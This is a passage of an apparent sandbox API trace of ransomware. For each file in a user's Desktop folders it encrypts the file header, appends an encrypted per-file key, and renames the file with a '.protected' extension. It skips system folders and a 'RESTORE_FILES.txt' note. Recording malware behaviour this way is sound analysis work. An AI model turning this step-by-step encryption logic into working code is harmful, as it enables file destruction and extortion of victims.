HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\34q8lyel2gi7tosols.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3") returned 125 [0091.184] StrStrW (lpFirst="34q8LYel2GI7toSolS.mp3", lpSrch=".txt") returned 0x0 [0091.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3") returned 125 [0091.184] StrStrW (lpFirst="34q8LYel2GI7toSolS.mp3", lpSrch=".rar") returned 0x0 [0091.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3") returned 125 [0091.184] StrStrW (lpFirst="34q8LYel2GI7toSolS.mp3", lpSrch=".zip") returned 0x0 [0091.184] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.185] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.185] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.185] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.185] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.185] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.185] CloseHandle (hObject=0x150) returned 1 [0091.185] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3.protected") returned 135 [0091.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\34q8lyel2gi7tosols.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\34q8lyel2gi7tosols.mp3.protected")) returned 1 [0091.186] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.186] lstrcmpiW (lpString1="3YkhdC6iOv.mp3", lpString2="Windows") returned -1 [0091.186] lstrcmpiW (lpString1="3YkhdC6iOv.mp3", lpString2="Program Files") returned -1 [0091.186] lstrcmpiW (lpString1="3YkhdC6iOv.mp3", lpString2="Program Files (x86)") returned -1 [0091.186] lstrcmpiW (lpString1="3YkhdC6iOv.mp3", lpString2="$Recycle.bin") returned 1 [0091.186] lstrcmpiW (lpString1="3YkhdC6iOv.mp3", lpString2="System Volume Information") returned -1 [0091.186] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3") returned 117 [0091.186] StrStrIW (lpFirst="3YkhdC6iOv.mp3", lpSrch=".protected") returned 0x0 [0091.186] lstrcmpW (lpString1="3YkhdC6iOv.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0091.186] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.186] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\3ykhdc6iov.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3") returned 117 [0091.187] StrStrW (lpFirst="3YkhdC6iOv.mp3", lpSrch=".txt") returned 0x0 [0091.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3") returned 117 [0091.187] StrStrW (lpFirst="3YkhdC6iOv.mp3", lpSrch=".rar") returned 0x0 [0091.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3") returned 117 [0091.187] StrStrW (lpFirst="3YkhdC6iOv.mp3", lpSrch=".zip") returned 0x0 [0091.187] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.187] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.187] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.187] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.187] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.188] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.188] CloseHandle (hObject=0x150) returned 1 [0091.188] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3.protected") returned 127 [0091.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\3ykhdc6iov.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\3ykhdc6iov.mp3.protected")) returned 1 [0091.188] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.188] lstrcmpiW (lpString1="Ak6j40UD.pps", lpString2="Windows") returned -1 [0091.188] lstrcmpiW (lpString1="Ak6j40UD.pps", lpString2="Program Files") returned -1 [0091.188] lstrcmpiW (lpString1="Ak6j40UD.pps", lpString2="Program Files (x86)") returned -1 [0091.188] lstrcmpiW (lpString1="Ak6j40UD.pps", lpString2="$Recycle.bin") returned 1 [0091.188] lstrcmpiW (lpString1="Ak6j40UD.pps", lpString2="System Volume Information") returned -1 [0091.188] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps") returned 115 [0091.188] StrStrIW (lpFirst="Ak6j40UD.pps", lpSrch=".protected") returned 0x0 [0091.188] lstrcmpW (lpString1="Ak6j40UD.pps", lpString2="RESTORE_FILES.txt") returned -1 [0091.188] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.188] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\ak6j40ud.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.189] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps") returned 115 [0091.189] StrStrW (lpFirst="Ak6j40UD.pps", lpSrch=".txt") returned 0x0 [0091.189] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps") returned 115 [0091.189] StrStrW (lpFirst="Ak6j40UD.pps", lpSrch=".rar") returned 0x0 [0091.189] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps") returned 115 [0091.189] StrStrW (lpFirst="Ak6j40UD.pps", lpSrch=".zip") returned 0x0 [0091.189] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.190] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.190] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.190] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.190] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.190] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.190] CloseHandle (hObject=0x150) returned 1 [0091.190] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps.protected") returned 125 [0091.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\ak6j40ud.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\ak6j40ud.pps.protected")) returned 1 [0091.191] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.191] lstrcmpiW (lpString1="K8Inyx3A_O61.bmp", lpString2="Windows") returned -1 [0091.191] lstrcmpiW (lpString1="K8Inyx3A_O61.bmp", lpString2="Program Files") returned -1 [0091.191] lstrcmpiW (lpString1="K8Inyx3A_O61.bmp", lpString2="Program Files (x86)") returned -1 [0091.191] lstrcmpiW (lpString1="K8Inyx3A_O61.bmp", lpString2="$Recycle.bin") returned 1 [0091.191] lstrcmpiW (lpString1="K8Inyx3A_O61.bmp", lpString2="System Volume Information") returned -1 [0091.191] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp") returned 119 [0091.191] StrStrIW (lpFirst="K8Inyx3A_O61.bmp", lpSrch=".protected") returned 0x0 [0091.191] lstrcmpW (lpString1="K8Inyx3A_O61.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0091.191] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.191] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\k8inyx3a_o61.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp") returned 119 [0091.192] StrStrW (lpFirst="K8Inyx3A_O61.bmp", lpSrch=".txt") returned 0x0 [0091.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp") returned 119 [0091.192] StrStrW (lpFirst="K8Inyx3A_O61.bmp", lpSrch=".rar") returned 0x0 [0091.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp") returned 119 [0091.192] StrStrW (lpFirst="K8Inyx3A_O61.bmp", lpSrch=".zip") returned 0x0 [0091.192] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.193] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.193] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.193] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.193] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.193] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.193] CloseHandle (hObject=0x150) returned 1 [0091.193] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp.protected") returned 129 [0091.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\k8inyx3a_o61.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\k8inyx3a_o61.bmp.protected")) returned 1 [0091.196] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.196] lstrcmpiW (lpString1="RO_pQkhqW-tc 83RVO.xls", lpString2="Windows") returned -1 [0091.196] lstrcmpiW (lpString1="RO_pQkhqW-tc 83RVO.xls", lpString2="Program Files") returned 1 [0091.196] lstrcmpiW (lpString1="RO_pQkhqW-tc 83RVO.xls", lpString2="Program Files (x86)") returned 1 [0091.196] lstrcmpiW (lpString1="RO_pQkhqW-tc 83RVO.xls", lpString2="$Recycle.bin") returned 1 [0091.196] lstrcmpiW (lpString1="RO_pQkhqW-tc 83RVO.xls", lpString2="System Volume Information") returned -1 [0091.196] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls") returned 125 [0091.196] StrStrIW (lpFirst="RO_pQkhqW-tc 83RVO.xls", lpSrch=".protected") returned 0x0 [0091.197] lstrcmpW (lpString1="RO_pQkhqW-tc 83RVO.xls", lpString2="RESTORE_FILES.txt") returned 1 [0091.197] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.197] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\ro_pqkhqw-tc 83rvo.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls") returned 125 [0091.197] StrStrW (lpFirst="RO_pQkhqW-tc 83RVO.xls", lpSrch=".txt") returned 0x0 [0091.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls") returned 125 [0091.197] StrStrW (lpFirst="RO_pQkhqW-tc 83RVO.xls", lpSrch=".rar") returned 0x0 [0091.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls") returned 125 [0091.197] StrStrW (lpFirst="RO_pQkhqW-tc 83RVO.xls", lpSrch=".zip") returned 0x0 [0091.197] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x5e1, lpOverlapped=0x0) returned 1 [0091.198] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.198] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x5e1, lpOverlapped=0x0) returned 1 [0091.198] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.198] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.198] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.198] CloseHandle (hObject=0x150) returned 1 [0091.198] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 